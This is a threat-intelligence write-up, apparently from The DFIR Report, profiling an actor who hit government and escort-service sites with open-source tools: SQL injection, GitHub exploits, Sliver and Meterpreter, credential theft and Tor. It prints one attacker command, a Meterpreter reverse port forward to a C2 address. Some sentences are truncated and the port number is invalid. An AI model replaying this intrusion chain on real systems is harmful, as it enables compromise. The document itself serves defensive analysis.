By analyzing tools, logs and artifacts left open to the internet, we were able to profile the threat actor and their victims.
After analyzing the artifacts we can conclude with moderate confidence that the majority of the threat actor activity conducted was not financially motivated.
The threat actor relied solely on open source tools and frameworks.
The threat actor targeted escort service websites in the same countries they were targeting government infrastructure.
The threat actor used nuclei to conduct scanning and software identification.
SQL Injection - The threat actor used sqlmap and ghauri to conduct SQL injections attacks on target hosts.
We observed the threat actor make a directory named exploits.
We observed the threat actor clone and then execute the exploit against a target.
You can see below the threat actor again cloned the exploit from GitHub then attempted to exploit the target.
Discussed further in the Command and Control section, the threat actor used multiple frameworks including Metasploit and Sliver.
The threat actor generated a number of various Sliver beacons over the time they used the server.
The threat actor used Sliver's execute-assembly to load SharPersist.
The threat actor used Sliver to upload modified versions of.
The threat actor used the built-in Meterpreter getsystem module which uses various techniques to create a payload as SYSTEM. T1053.
LinPEAS. For several of the targets, after gaining shell access, we found the threat actor executing LinPEAS to try to discover privilege escalation paths on the exploited host.
The threat actor used various masquerading naming conventions to try and blend-in on systems to which they gained access.
The threat actor used various techniques to access hashes and credentials of the target hosts.
In one instance, the threat actor used certutil to download PowerView to run various discovery commands.
The threat actor used the Meterpreter module portfwd to establish a reverse port forward with the C2 IP:. portfwd add -R -p 89474 -l 4453 -L 192.169.6.122.
The threat actor regularly made use of torify to proxy activity via the TOR network.
This Cyber News was published on thedfirreport.com. Publication date: Mon, 18 Dec 2023 01:43:05 +0000